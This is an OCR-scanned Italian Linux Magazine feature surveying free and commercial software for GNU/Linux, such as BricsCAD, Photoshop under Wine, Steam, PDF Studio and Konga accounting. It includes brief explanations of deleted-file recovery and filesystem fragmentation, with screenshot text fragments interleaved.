(CAR COSTOSI 
Remel: fi 00m 
VOOR 


© Diskimage 

© Custom 
Options: 

TT Show All Drives (Use with Care) 


pe: (orve use 2] re [imm =] | 
PENDRIVE USB AVVIABILE 


installiamo UNetbootin (At{p://unetbootin.sourceforge.nef). Colteghia- 
mo la pendrive USB al PC, selezioniamo Diskimage e premiamo su “...” 
per trovare l'ISO. A questo punto, clicchiamo su OK e aspettiamo che la 


procedura termini. Subito dopo avviamo il PC da periferica USB. 
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software completi 
per GNU/Linux 


Soluzioni non soltanto Libere e Open Source, ma 
anche programmi commerciali che ti permettono 
di arredare casa, sviluppare app, fare grafica 
professionale o recuperare file cancellati 


rebbe passare da Windows a GNU/LI- 

nux è di non poter utilizzare i programmi 
di cui ha bisogno. Questo è vero soprattutto 
per gli uffici, posti nei quali servono applica- 
zioni specifiche. È una preoccupazione che 
oggi non ha particolare motivo di esistere: 
la maggior parte dei programmi che si usano 
su Windows può essere sostituita da softwa- 
re Libero e Open Source per GNU/Linux. Anzi, 
molte distribuzioni incorporano di serie tutti gli 
strumenti principali, dai browser alla suite per 
ufficio, i programmi per manipolare immagini e 
visualizzare PDF. Se poi si desidera avviare un 
programma che si usava su Windows, è in ge- 


i a principale preoccupazione di chi vor- 
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Luca Tringali 


nere possibile ricorrere a Wine, che è ormai ca- 
pace di far funzionare tutti i software che non 
hanno richieste particolari in termini di risorse 
grafiche o hardware. Per altri specifici scopi 
ancora, è possibile ricorrere a dei programmi 
commerciali nativi per GNU/Linux. Questi sof- 
tware si pagano, naturalmente, a prescindere 
dal fatto che siano Liberi o proprietari. | pro- 
grammi sviluppati per scopi molto specifici, 
(ad esempio per la contabilità aziendale, per 
la gestione di grandi database o i videogiochi) 
vengono curati da aziende che ovviamente ne 
fanno un business e hanno tutto il diritto di 
farsi pagare. Scrivere un programma, infatti, 
costa molto perché è necessario del tempo e 


(a) 


. LIBREOFFICE CALC 
- fogli di calcolo liberi e gratuiti por- 


tano il nome di Calc, un programma 
che non ha nulla da invidiare a Ex- 
cel. Supporta perfino le macro VBA 
ed eventualmente anche Python. 
www.edmaster.it/url/7207 
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Add Movies 
Add Charts 
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| LIBREOFFICE IMPRESS 


Le presentazioni sono tutt'ora qual- 
cosa di molto comune: PowerPoint 
ha fatto la storia, ma oggi Impress è 
una alternativa più che valida. 
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KEXI 

Lavorare con i database è indispensa- 
bile per motti uffici: per fortuna esiste 
una seria alternativa all'ormai vecchio 
Access: si chiama Kexi, e supporta 
tutti i principali tipi di database. 
www.edmaster.it/url/7209 


OTCREATOR 


—_ Sevi piace programmare, soprat- 


tutto in C++, l'ambiente di sviluppo 
migliore è certamente QtCreator: 


— permette di realizzare applicazioni 
| per più sistemi, incluso Android. 


www.edmaster.it/urt/7210 
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Fig. 1- L'interfaccia di BricsCAD è molto simile 
a quella di AutoCAD 


il lavoro di un programmatore deve essere pa- 
gato. Spesso c’è confusione su questo tema, 
perché si pensa che tutto ciò che si trovi su 
GNU/Linux debba essere gratuito, ma ovvia- 
mente non è così: se un programmatore non 
venisse pagato per il suo lavoro, non potreb- 
be farlo. Buona parte del software che viene 
normalmente distribuito nelle varie distro GNU/ 
Linux è gratuito perché è stato scritto da per- 
sone che lo fanno per passione e hanno già 
un altro lavoro, oppure da chi ha ricevuto delle 
sponsorizzazioni temporanee o donazioni dagli 
utenti. Questo però vale per i programmi più 
generici. Se si vuole un'applicazione molto 
specifica, è probabile che nessun programma- 
tore riesca ad occuparsene nel proprio tempo 
libero ed è necessario pagare qualcuno perché 
scriva e mantenga quel programma nell’am- 
bito del proprio lavoro. In questo numero di 
Linux Magazine abbiamo deciso di presenta- 
re i migliori programmi commerciali per GNU/ 
Linux, nativi o utilizzabili tramite Wine, per di- 
mostrare che il passaggio da Windows può 
essere indolore. Naturalmente, cogliamo l’oc- 
casione anche per ricordare i software Liberi 
e Open Source gratuiti che si possono trovare 
nei repository e che non faranno rimpiangere 
i programmi utilizzati su altri sistemi operativi. 
Queste pagine sono dunque particolarmente 
indicate per quegli utenti che vorrebbero pas- 
sare a GNU/Linux e temono di non riuscire a 
trovare i loro programmi preferiti o di non ri- 
uscire a sostituirli adeguatamente. Ma vuole 
anche essere un modo per ricordare agli utenti 
abituati al FOSS (Free Open Source Software) 
che le alternative commerciali possono sempre 
essere un compromesso da considerare, al- 
meno negli ambiti in cui il Software Libero non 
offre sufficienti funzionalità, per poter comun- 
que lavorare (svolgendo determinati compiti) 
su GNU/Linux senza dover ricorrere ad un PC 
equipaggiato con Windows. 


BRICSCAD: DISEGNO 
PROFESSIONALE GRATIS 


Nel mondo del disegno tecnico computerizza- 
to, AutoCAD è il programma per antonomasia. 
E molti utenti neppure sanno che esistono al- 
tri programmi CAD. Tuttavia, per una serie di 
motivi, negli ultimi anni un numero crescente 
di persone sta cercando di allontanarsi dal 
software prodotto da Autodesk: il principale è 
probabilmente il prezzo, che in effetti è piut- 
tosto alto anche se è ovvio che il costo di un 
software vada considerato in base alla sua 
qualità. L'altro motivo fondamentale è che Au- 
toCAD non è mai stato rilasciato per sistemi 
GNU/Linux e con Wine non funziona partico- 
larmente bene, soprattutto nelle ultime versio- 
ni. Il problema è che AutoCAD è notoriamente 
un programma affamato di memoria RAM e 
gli OS Microsoft sono famosi per non avere 
una perfetta gestione della memoria. Anche 
per questo motivo, ultimamente molti profes- 
sionisti nel campo della grafica e multimedia 
si stanno spostando proprio verso il sistema 
operativo Libero. La resistenza di Autodesk, 
nonostante le richieste degli utenti, a rilasciare 
versioni per sistemi GNU/Linux ha spinto molti 
utenti a cercare alternative. Per chi ha bisogno 
di utilizzare soltanto le funzioni principali di un 
programma CAD esiste LibreCAD, semplice 
e completamente Libero e gratuito. Per chi ha 
bisogno di qualche funzione in più è possibile 


Fig. 2- BricsCAD è famoso per le sue capacità 
di modelling 3D 
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"ORULAR i] 
Il miglior visualizzatore di documen- | 
ti, vera alternativa ad Acrobat Re-— 
ader è Okular. Supporta i principali 
formati, inclusi i PDF con form. 
www.edmaster.it/url/7208 


GWENVIEWO i 

Gwenview è il migliore visualizza-. 
tore di immagini per sistemi GNU/ 
Linux, è anche uno dei pochissimi | 
in circolazione in grado di mostrare | 
granmate oe nio 

www.edmaster.it/url/7204 
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bi 
| programmi per la gestione di in- 
formazioni geografiche, i cosiddetti 
GIS, sono spesso proprietari. Per 


è libero e gratuito: si chiama QGIS. 
www.edmaster.it/url/7205 


LIBRE OFFICE WRITER 
L'alternativa a Microsoft Word sì 
chiama Writer, ed ha una interfaccia 
molto semplice e comoda da utiliz- 
zare. Le funzioni sono le stesse di 
Word, ma con qualche miglioria. 
www.edmaster.it/url/7206 
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puntare su QCAD, programma Libero che 
ha una versione gratuita e una a pagamento 
con alcune funzioni utili in più soprattutto per 
il supporto ai file originali di AutoCAD. Infi- 
ne, per chi vuole qualcosa che possa davve- 
ro sostituire AutoCAD, esiste BricsCAD. Si 
tratta di una delle migliori alternative e sup- 
porta praticamente le stesse funzionalità del 
suo antagonista (maggiori informazioni sono 
disponibili sulla pagina www.bricsys.com). 
Ha una interfaccia molto simile ad AutoCAD ed 
è addirittura disponibile, sul sito Web ufficia- 
le, un ebook gratuito che guida gli utenti nella 
transizione da AutoCAD a BricsCAD in pochi 
passi. Inoltre, BricesCAD è distribuito per Win- 
dows, MacOS e GNU/Linux. Attualmente, una 
licenza annuale (dunque, da rinnovare anno 
dopo anno) di AutoCAD costa 1793 euro. In- 
vece, una licenza perenne (che è sempre vali- 
da, non va rinnovata ogni anno) per la versio- 
ne attuale di BricsCAD costa dai 510 ai 1100 
euro a seconda dei plug-in di cui necessitiamo 
e se se vogliamo aggiornare gratuitamente 
alla versione successiva (comprando di fatto 
due versioni, quella attuale e quella futura). 
Inoltre, BriesCAD è sempre gratuito per stu- 
denti e istituti scolastici. Significa che un liceo 
o un istituto tecnico e i loro studenti a casa, 
possono utilizzare BriesCAD in modo com- 
pletamente gratuito, scaricando ogni anno la 
versione più recente del programma. Per farlo, 
è necessario registrarsi sul sito Web ufficiale 
della software house che sviluppa BricsCAD 


Fig. 3 - È possibile gestire oggetti 3D diret- 
tamente in Nuke, inserendoli nei filmati e 
organizzare la scena usando i nodi 


o senza budget. Anche Blender offre un com- 
positor gratuito di ottima qualità, ma è un po’ 
scomodo da utilizzare. La maggior parte degli 
utenti che svolgono un lavoro semi-professio- 
nale tende a puntare su Adobe After Effects, 
ma questo ha due problemi: non è disponibile 
per GNU/Linux e non c'è una versione gratuita 
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EFFETTI SPECIALI 
PROFESSIONALI 


Nel mondo degli effetti visuali (gli effetti specia- 
li realizzati in computer grafica) il componente 
più importante è sicuramente il compositor. 
In fondo, si tratta sempre di comporre più livel- 
li uno sopra l’altro, gestendo le trasparenze e 
i movimenti dei vari filmati. In questo campo, 
GNU/Linux è guardato con molta attenzione 
soprattutto considerando l’ormai definitivo 
passaggio al digitale da parte delle produzio- 
ni cinematografiche (non soltanto amatoriali): 
in molti puntano sulla capacità di GNU/Linux 


. di gestire senza difficoltà dei server di ren- 


dering per ottenere risultati migliori in minore 
tempo, senza il rischio che qualcosa si bloc- 
chi. Ovviamente, su GNU/Linux esiste un edi- 
tor video gratuito che offre ottime possibilità di 
compositing, Kdenlive. È una perfetta soluzio- 
ne per produzioni indipendenti a basso costo 


di fantascienza. Nuke ha il vantaggio di essere 
disponibile per GNU/Linux, sfruttando appieno 
l’ottima gestione delle risorse del nostro siste- 
ma operativo preferito. 

Inoltre ha una versione non commerciale 
(www.edmaster.it/url/7194) che permette di svi- 
luppare i propri progetti personali in modo 
gratuito. Nuke si basa sull’idea di lavorare con 
dei nodi da collegare tra loro per applicare de- 
terminati effetti, un po’ come il compositor di 
Blender, ma propone un'interfaccia intuitiva 
che semplifica l'apprendimento ai principianti. 


ADOBE PHOTOSHOP 
SU GNU/LINUX 


Photoshop è nato come programma di fo- 
toritocco ed è tutt'ora il sinonimo stesso del 
concetto di fotoritocco (si usa spesso il termi- 
ne “photoshoppare” invece di “fotoritoccare”). 


Oggi le sue funzionalità in questo campo sono 
pienamente eguagliate dal programma Libero 
e gratuito GIMP, che infatti è molto conosciu- 
to. Un ambito nel quale Photoshop è ancora 
superiore è il disegno a mano libera: realiz- 
zare disegni con GIMP è infatti decisamente 
più complicato. Ovviamente, nel campo del 
Software Libero esiste un'eccellente alternati- 
va a Photoshop anche per quanto riguarda il 
disegno a mano libera ed è Krita, programma 
apprezzato da diversi famosi artisti e disegna- 
tori. A volte, però, si preferisce un programma 
che faccia le due cose assieme, che si possa 
usare sia per il disegno che per il fotoritocco: 
in questo caso, bisogna certamente ricorrere a 
Adobe Photoshop. Ovviamente, un altro moti- 
vo per voler utilizzare il programma di Adobe 
può essere la curva di apprendimento: chi nel 
proprio ufficio è abituato ad usare Photoshop, 
potrebbe avere qualche difficoltà a passare 
a GIMP e Krita, considerato che le interfacce 
sono molto diverse. Ciò significa che servireb- 


Photoshop 


PS File Edit Image Layer 
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Untitled-1 @ 100% (Layer 1,RGB/8)* * 


Preset: | Default Photoshop Size PRIN 


Color Mode: | RGB | RGB Color *| 


be del tempo per imparare come funzionano 
questi due “nuovi” programmi, e magari è più 
semplice rimanere con il programma a cui si è 
già abituati. Ovviamente, Photoshop si può ac- 


quistare sul sito di Adobe, anche se finora non ‘ 


è stata rilasciata una versione per GNU/Linux. 
In compenso, da qualche tempo si può scari- 
care gratuitamente la versione CS2 di Adobe 
Photoshop: basta raggiungere la pagina Web 
www.edmaster.it/url/7195. A causa di un proble- 
ma con il mantenimento del server che si oc- 
cupava del controllo delle licenza di Photoshop 
CS2, Adobe ha ritenuto che fosse più sempli- 
ce rendere il programma disponibile gratuita- 
mente invece di aggiornare il proprio server. 
La versione CS2, pur essendo ormai un po’ da- 
tata, ha comunque tutte le funzionalità princi- 
pali di Photoshop e funziona abbastanza bene 
su tutte le distro GNU/Linux grazie a Wine. 
Per ottenere una copia è sufficiente creare un 
account Adobe oppure accedere con il proprio 
profilo Facebook o Google. 
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Fig. 4 - È possibile utilizzare Photoshop su GNU/Linux grazie a Wine 
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Studenti ed insegnanti di scuole a 
carattere scientifico, ingegneri, e 

— ricercatori hanno spesso bisogno di 
un programma che esegua calcoli 

- ag Maxima è la soluzione. 
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i KASPERSKY ANTIVIRUS 
I virus pericolosi per GNU/Linux non 


— sonomolti, ma può capitare di dover. | 
‘lavorare su pendrive che provengono‘ 
da sistemi Windows, e sarebbe bene | 
—. impedire un eventuale contagio. Per 
Ls è una buona idea avere un 

* antivirus. 

www.edmaster.it/url/7216 
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— dischi rigidi e delle pendrive con 
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— TestDiski possiamo recuperare. 


www.edmaster.it/url/7217 
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KLEOPATRA 

La riservatezza delle informazioni 
è preziosa, considerando gli ultimi 
spionaggi dell'NSA. Inviare email 
crittografate non è mai stato tanto 
semplice, grazie a Kleopatra. 
www.edmaster.it/url/7219 


THUNDERBIRD 

Oggi siamo abituati ad accedere 
alle nostre email tramite i siti web 
dei provider, ma per alcuni servizi, 
come quelli di PEC può essere utile 
un gestore della posta elettronica 
come Thunderbird. 
www.edmaster.it/url/7220 


Gestione dispositivi 


OPENSC 

In tutta Italia si stanno diffondendo 
le tessere sanitarie elettroniche e 
le firme digitali. OpenSC è il driver 
open source che supporta tutti i 
principali lettori di smartcard. 
www.edmaster.it/url/7221 
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Gestire le partizioni del nostro 
computer non è difficile, grazie a 
Gparted. Naturalmente, si dovrebbe- 
ro manipolare le partizioni solo se si 
sa cosa si sta facendo. 
www.edmaster.it/url/7222 
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Steam è disponibile nei repository del- 

le principali distro. Se si vuole trasfor= 
mare il proprio PC in una gaming station, esiste 
anche Steam0S, scaricabile gratuitamente dalla 
pagina Web www.edmaster.it/url/7196. 
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Computer 


home 


Reporter 


Steam viene aggiornato spesso, quin- 
di al primo avvio il programma deve 
scaricare molti update, in modo da assicurarsi 
che sia sempre installata l'ultima release. Non 
dobbiamo fare altro che attendere con pazienza. 


Sat 13:42 


Activities af6team 


STORE LIBRARY COMMUNITY TRINGALINVENT 


Si possono usare solo i giochi disponi- 

bili per sistemi GNU/Linux: per il resto 
non ci sono altri vincoli. Possiamo cercare nello 
STORE, nella categoria Free to play per trovare 
un videogioco gratuito e vedere come funziona. 


Steam Install Agreement 


YOU SHOULD CAREFULLY READ THE ENTIRE 
FOLLOWING LICENSE AGREEMENT BEFORE INSTALLIN( 
THIS SOFTWARE PROGRAM. THIS AGREEMENT 
CONTAINS IMPORTANT TERMS THAT AFFECT YOUR 
LEGAL RIGHTS. BY INSTALLING THE SOFTWARE 
PROGRAM, YOU AGREE TO BE BOUND BY THE TERMS di 
‘THIS AGREEMENT. IF YOU DO NOT AGREE TO THE 
TERMS OF THIS AGREEMENT, PLEASE DO NOT INSTALL! 
THIS SOFTWARE PROGRAM. 


Che si usi SteamOS o la propria di- 

stro GNU/Linux, basta avviare lo 
Steam Client per cominciare a utilizzarlo. Se è 
il primo avvio, dobbiamo leggere ed accettare 
le condizioni d'uso: è gratuito, ma non Libero. 


Finiti gli aggiornamenti, possiamo ac- 

cedere a Steam con il nostro account 
personale o crearne uno nuovo. Possiamo anche 
spuntare il campo Remember my password, in 
modo da loggarci automaticamente. 


STORE. LIBRARY COMMUNITY 
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No More Room in Hell 


Cliccando su Play Game, Steam ci 

chiede dove installare il gioco: seguia- 
mo la procedura. Controlliamo l'avanzamento 
dalla sezione Downloads della nostra LIBRARY 
e quando sarà finto basterà premere PLAY. 
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Fig. 5 - Con Ashampoo Home Designer si possono progettare facilmente edifici e ottenere modelli 3D 


ASHAMPO0 HOME DESIGNER 


Per qualcuno è un passatempo, per altri un la- 
voro. Ma progettare e arredare la propria casa 
(o quella degli altri) è una cosa importante. 
Un architetto che progetta una casa, ovvia- 
mente, utilizzerà un software CAD professio- 
nale che gli permette di ottenere risultati più 
affidabili e poter eseguire tutti i calcoli ingegne- 
ristici necessari. Tuttavia, gli architetti accetta- 
no sempre un'idea da parte del committente: 
se abbiamo in mente la nostra casa ideale, 
dobbiamo spiegarla all’architetto. Descriverla 
a parole è poco pratico, si fa certamente pri- 
ma a disegnarla. A mano libera potrebbe non 
essere una grande idea, soprattutto se i nostri 
disegni sembrano sempre involontariamente 
opere di Picasso. E se non siamo esperti di 
CAD potrebbe essere complicato fare un buon 
progetto. La soluzione è rappresentata da As- 


hampoo Home Designer, programma com- 
merciale che è disponibile, nella sua versione 
completa, nel DVD allegato a questo numero 
di Linux Magazine. Si tratta di un programma 
per Microsoft Windows che funziona senza 
troppi problemi anche su GNU/Linux tramite 
Wine. Home Designer è stato pensato proprio 
per permettere a chiunque di disegnare la pro- 
pria casa ideale, partendo dalla vista a pianta o 
spaccato: è poi il programma a unirle automa- 
ticamente creando un modellino 3D che si può 
ispezionare e persino arredare, per farsi un'idea 
di come apparirebbe davvero la casa e come 
si possono posizionare i mobili (Magari per cer- 
care di mettere le prese della corrente nei posti 
giusti invece che dietro un armadio). Il disegno 
è molto intuitivo: basta scegliere gli elementi 
che si desiderano (parete, porta, finestra, ecc) 
e posizionarli dove necessario. 


GOOGLE EARTH: IL PACCHETTO DEBIAN O RED HAT 


Google Earth è uno dei passatempi più 
famosi di Google: gli utenti passano ore a 
guardare posti sconosciuti, facendo simu- 
lazioni dì volo e controllando i puntì GPS 
del loro giro in mountain bike. Ne esiste 


un pacchetto per Debian e distro Red Hat 
scaricabile dal sito Web ufficiale. 

It programma appare un po' lento nell’avvio 
e richiede l'accelerazione 3D, ma funziona 
proprio come la versione per Windows. 
Maggiori informazioni sono disponibili sulla 
pagina Web www.edmaster.it/url/7197. 
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MANIPOLIAMO | PDF 


Creare PDF e visualizzarli è, in linea di massi- 
ma, più facile su un sistema GNU/Linux che su 
Windows. E questo utilizzando Software Libero 
e Open Source. Infatti, per creare PDF da una 
qualsiasi applicazione basta utilizzare le fun- 
zioni di “stampa PDF” incluse in tutti i princi- 
pali programmi Liberi. E per la visualizzazione, 
ogni distro porta con se almeno un visualizza- 
tore PDF. Il problema si pone quando si vuole 
modificare un PDF: in quel caso, i programmi 
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Same and Sansbilty 
Don Quisote 
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disponibili non sono molti. Ovviamente c'è il fa- 
moso Adobe Acrobat, ma esiste anche l'ottimo 
PDF Studio, rilasciato nativamente per GNU/ 
Linux ad un prezzo non troppo alto. Prezzo che 
scende ulteriormente grazie al codice sconto 
dedicato ai lettori di Linux Magazine: durante la 
fase di acquisto della licenza, inseriamo il codi- 
ce LinuxMag per ottenere il 15% in meno sul 
prezzo della versione che vogliamo acquistare. 
Il software è disponibile sul DVD allegato a que- 
sto numero di Linux Magazine. 


Creiamo e modifichiamo un PDF 


Con PDF Studio è possibile eseguire modifiche a qualsiasi PDF 


Export Pages as PNG 
Export Pages as TIFF 
Export Pages as GIF 


Import Images As Pages 
Import Image as Stamp 


IMPORTARE | FILE 
0 1 Si può creare un nuovo documento im- 
portando pagine da un PDF esistente 
oppure da immagini. Si può anche scansionare 
un'immagine e passarla all'OCR per ottenere un 
PDF ricercabile. 
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found on the island suggest that humans have 
lived there for at least 4000 years. In its history, 


OT Eat DUISITESSI orusrasa 
hunting retreat, In 1924, the entire island was 
purchased by Dr. Henry Norton Torrey. His 

daughter, Eleanor Torrey West, along with her 
husband Clifford B. West began the Ossabaw 

Project, inviting artists, scientists and thinkers to | 
the island. «i 


LE ANNOTAZIONI 
2 Le pagine possono essere arricchite 
dalle annotazioni, come commenti o 
disegni a mano libera, e si può evidenziare del 
testo. Le annotazioni possono essere salvate, 
di modo che altri utenti possano vederle. 
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MODULI INTERATTIVI 

Si possono anche creare delle pagine 
contenenti dei moduli PDF, che ovvia- 
mente si possono pure compilare ed esportare, 
in modo da consegnarli direttamente in formato 
digitale a chi li richiede (invece di portare dei mo- 
duli stampati). 
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dè Cerdfying Spiate (Alon Form fil ani Synabtes i) 
Seanpture information 5 

Reason: [Lapprave Ss document... 

n i Location | 


Contactinfo: | 


LA FIRMA DIGITALE 

Alla fine, prima di salvare il docu- 
mento su cui si sta lavorando, è anche 
possibile firmarlo digitalmente, sfruttando la 
propria chiave GPG oppure una smart card come 
quelle che si utilizzano in Italia e che hanno va- 
lore legale. 


Ashampoo* 


pe x 


File/Folder 

[DO fi) D:\Directory002852\al-al.bmp 
(O fi] D:\Directory002852\ar-sa.bmp 
DO fi) D:\Directory002852\a2-az.bmp 
[fis] D:Pirectory002852\be-by.bmp 
DO RR) D:Pirectory002852]bg-bg.bmp 
[O RR) D:Directory002852\ca-es.bmp 
TO fi) D:\Pirectory002852\cs-cz.bmp 
[D fia) D:\Pirectory002552\da-dk.bmp 
[O fi] D: \Directory002852\de-ch.bmp 
O fi) D:Directory002852\de-de.bmp 
CD fifa) D:\Pirectory002852\el-gr.bmp 
DO fils) D:\Pirectory002852\elr-gr.bmp 
[O RR) D:Directory002352\en-gb.bmp 
[O] fi) D:\Pirectory002852\en-uk.bmp 
[O fi) D:\Pirectory002852\en-us.bmp 
[O fi) D:\Pirectory002852\es-ar.bmp 
no] D: Directory002352\es-es.bmp 


File 
bmp 

bmp 822 «if Good 
bmp 822 «till Good 
bmp 1078 «10 Good 
bmp 822 «sì Good 
bmp 822 sail Good. 
bmp 822 sail Good 
bmp 822 «10 Good 
bmp 822 «tif Good 
bmp 822 «al Good 
bmp 822 «ail Good 
bmp 822 sal Good 
bmp 

bmp 

bmp 

bmp 

bmp 


Fig. 6 - Undeleter permette di recuperare file cancellati senza complicarsi la vita 


RECUPERIAMO 
I FILE CANCELLATI 


A tutti capita di commettere degli errori e can- 
cellare inavvertitamente un file o persino una 
partizione. Per nostra fortuna, però, un file can- 
cellato non scompare automaticamente dal di- 
sco rigido. Infatti, i dati su una partizione del di- 
sco rigido sono organizzati con file system (i più 
diffusi sono EXT, FAT e NTFS). | file system non 
fanno altro che tenere un elenco dei file, asso- 
ciando al nome di ciascuno di essi la posizione 
dei byte del file all’interno del disco rigido. Per 
risparmiare tempo, quando si cancella un file, 
i byte non vengono davvero eliminati dal disco 
(portandoli a 0), ma si elimina semplicemente il 
nome del file dall'elenco. Così, la porzione di di- 
sco che gli era stata assegnata può essere data 
ad un altro file e quindi sovrascritta. Ciò signifi- 
ca che se ci accorgiamo di avere cancellato un 
file, l'importante è non toccare nulla: finché non 
scriviamo altri file sul disco, siamo sicuri che i 
dati non verranno davvero cancellati e potremo 
provare a recuperarli. La. cosa migliore da fare è 
chiudere immediatamente il PC (con il classico 
comando sudo halt) e poi avviare il computer 
da un DVD o una pendrive avviabile aprendo il 
disco rigido in sola lettura. Poi possiamo utiliz- 
zare un programma per recuperare i file: esiste il 
famoso Testdisk, molto potente ma un po’ sco- 
modo da utilizzare, con la sua interfaccia di te- 
sto. Per un utente abituato a interfacce grafiche 
conviene utilizzare un programma commerciale 
come Ashampoo Undeleter, che può essere 
prelevato dal DVD allegato a questo numero di 
Linux Magazine. Questo programma semplifica 
l'operazione di recupero dei file, rendendola alla 


portata di tutti. Ci sono, comunque, un paio di 
cose da tenere a mente: in particolare, il fatto 
che i dati vengono registrati sul disco utilizzan- 
do un file system. Ovviamente, ciascuno dei file 
system lo fa in modo diverso: i file system di 
tipo FAT o NTFS (su sistemi Windows) scrivo- 
no i byte di un file immediatamente dopo quelli 
del file precedente. E questo significa che se il 
precedente dovesse aumentare in dimensioni 
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+ Perilfotoritocco, GIMP èil program- | 
‘ mallibero più vicino a Photoshop. È 
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‘ Quello che GIMP è per a grafica 

i raster, Inkscape lo è per la grafica 

> Vettoriale: la scelta migliore quando | 
» sitratta di realizzare disegni ed È 
‘anche semplici impaginati come i 
‘volantini e brochure. È 
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OPENSSH } 
Uno degli aspetti più interessati i 
di GNU/Linux è che è facilissimo | 
accedervi da remoto, in modo da | 
— avere sempre il controllo sui propri 
- file. SSHoffre la possibilità di avere 
© unterminale remoto. 


— www.dmaster.it/url/7233 
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. SYNAPTIC 
. l programmi, in GNU/Linux, sono È 
> distribuiti come pacchetti. Synaptic 
 èunodei più antichi gestori dei 

| pacchetti grafico, e permette tutte‘ 
* leoperazioni, inclusi gli afgiorna- © 
— menti di sistema. È 
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(perché noi ci aggiungiamo dei dati, come in 
un testo che possiamo continuare a scrivere) 
la nuova parte dovrà essere scritta molto più 
avanti nel disco, dunque frammentando la sua 
distribuzione. In altre parole, se creiamo due 
file, verranno scritti sul disco come FILEA1- 
FILEB. Se poi modifichiamo il primo, sul disco 
troveremo FILEA1-FILEB-FILEA2. Nonostan- 
te NTFS cerchi di ridurre questo problema, 
a lungo andare si presenta comunque ed è il 
motivo per cui la deframmentazione dei dati è 
molto importante (nonostante possa diminuire 
la vita del disco rigido, soprattutto degli SSD). 
| file system EXT, utilizzati di default in tutte le 
distro GNU/Linux, distribuiscono i file sul disco 
rigido in modo che tra di loro vi sia il maggio- 
re spazio possibile, praticamente dividendo la 
partizione in fette più o meno equidistanti tra 
loro (in parole povere, come quando si vuole 
tagliare una torta affinché tutti gli invitati alla 
festa possano averne una fetta). 

Idealmente, se ci sono tre soli file su una par- 
. tizione EXT, si troveranno uno all’inizio, uno 
alla fine e uno al centro del file system. In que- 
sto modo, ogni file ha sempre tutto lo spazio 
che vuole per aumentare di dimensioni e non 
deve essere frammentato. Non è che su EXT 
non esista del tutto la frammentazione, ma in 
genere è talmente piccola da essere trascu- 
rabile. La frammentazione su un file system 
EXT comincia a essere visibile soltanto se lo 
spazio occupato sulla partizione è superiore al 
95%, situazione comunque abbastanza rara. 
La differenza nei file system di cui abbiamo 
parlato implica anche che è più facile recupe- 
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Fig. 7 - Konga è un programma progettato proprio per la normativa italiana sulla contabilità aziendale 


Protocollo IVA Nr. 14 Data comp. IVA 31/12/2000 El Documa 


rare file danneggiati o cancellati da file system 
EXT, invece che da FAT o NTFS, perché que- 
sti secondi avranno comunque sempre una 
maggiore frammentazione. Per questo moti- 
vo se non si è esperti conviene puntare su un 
programma semplice e intuitivo proprio come 
come Ashampoo Undeleter, che non richiede 
particolari conoscenze da parte dell'utente 
finale e cerca di ottenere automaticamente il 
massimo dei file anche da file system partico- 
larmente frammentati (è tipico avere delle pen- 
drive USB formattate in FAT). 


KONGA: CONTABILITÀ 
AZIENDALE IN UN CLIC 


Ogni azienda ha bisogno di tenere una conta- 
bilità, in linea con la normativa italiana, per 
dimostrare il proprio fatturato, l'IVA da versa- 
re allo Stato, e i contributi dei dipendenti. Ov- 
viamente, le aziende piccole possono provare 
a gestire il tutto con un foglio di calcolo, ma 
se le cose si complicano è molto meglio avere 


un software apposito, che faccia buona parte 
dei calcoli in automatico. Ne esistono diversi, 
e uno dei più comuni per GNU/Linux è Konga 
{www.edmaster.it/url/7200), sviluppato da una 
azienda italiana în modo modulare. È quindi 
possibile acquistare soltanto i moduli di cui sì 
ha bisogno [per le vendite, per il magazzino, 

o per l'uso del POS). Ovviamente esistono 
alternative gratuite, ma non sono progettate 
specificamente per il diritto tributario italiano. 


PROGRAMMIAMO 
CON GNU/LINUX 


Per gli sviluppatori, GNU/Linux è un piccolo para- 
diso. C'è tutto quello di cui si può avere bisogno. 
Tuttavia, le aziende spesso non la pensano così, 
perché i programmi commerciali si vendono prin- 
cipalmente per Windows. Quindi i programmatori 
sono spesso invitati a utilizzare ambienti di pro- 
grammazione e toolkit che permettano lo svilup- 
po su Windows, o magari cross platform. Il toolkit 


Libero più comune per lo sviluppo di applicazioni 
crossplatform è Qt, che con il proprio IDE QtCre- 
ator rende quasi banale la scrittura di programmi 
che funzionino sia su GNU/Linux che su Windows. 


È certamente la scelta migliore per i nuovi proget- , 


ti. Tuttavia, se l'azienda per la quale lavoriamo ha 
acquistato delle licenze del famoso Microsoft Vi- 
sual Studio e lo sta già usando da anni, è ormai 
possibile utilizzarlo anche su GNU/Linux, -sia per 
scrivere in C++ che in .NET (con C#). 


Visual Studio sul Pinguino 


Sei abituato a usare I'IDE di Microsoft? Usala anche sul GNU/Linux! 


Workloads Individual components Language packs 
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Mz: Visual Studio extension devi 
Ch Create add-ons and ertentici 
commands, code anatjzers and to 


Crente and debug 391 
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SVILUPPO PER GNU/LINUX 

Con la nuova versione di Visual Studio 

è possibile realizzare applicazioni an- 
che per il sistema operativo del Pinguino: basta 
scegliere la voce Linux development with C++. 
In alternativa, si possono anche realizzare appli- 
cazioni crossplatform con .NET. 


Configuration: 


{4 Configuration Properties 
| General 
Debugging 
VC++ Directories 
Copy Sources 
4 Ge 


{ActivelDebug] pi RERISE Platform: |Activelu64) "OE 
Look for options or switches: 


Command Line 
4 Linker 

General 

ava o Library Dependencies _ 
PRI Link Timeout 
apesenoe Linker 


CONFIGURAZIONE 

Configurando l'ambiente di com- 

pilazione e debugging, si possono 
controllare diverse opzioni utili, come il vin- 
colo di non eseguibilità dello stack {protezione 
dal buffer overflow) e le librerie da linkare al 
file eseguibile. 


Uni Gemiopmene di 


New Project 
» Recent «NET Framework 4.5.2 + Sortby: Default 
4 Installed rt 
Bal Blink (Raspberry) 
4 Templates 
d Visual C# 
d Visual Basic dI 
4 Visual C++ i Empty Project (Lin 
General 
+ 
Test 5) Makefile Project (Linux) 


Win32 
4 Cross Platform 
Linux 
» Other Project Types 


Not finding what you are looking for? 
Open Visual Studio Installer 


V Online 


TIPO DI PROGETTO 

Creando un nuovo progetto è possi- 
bile scegliere sia la piattaforma che 
il tipo di progetto [per GNU/Linux sono dispo- 
nibili progetti da console, oppure direttamente 
progetti per i Raspberry Pi). Si può scegliere 
di creare un makefile standard. 


v | Solution Explorer 
coass-lo-s 


Search Solution Explorer (Ctrl+;} 


CRCR dll 
21) 


fl. Solution 'ConsoleApplication10' (1 project) 
x 4 i ConsoleApplication10 (Linux) 
Db s-M References 
be@ External Dependencies 


Db ++ main.cpp i 
tired to host i 
s below. 


COMPILA SU SSH 
La compilazione e il debug sono pos- 
sibili tramite SSH. Ciò significa che se 

nel nostro ufficio dobbiamo usare un PC Win- 

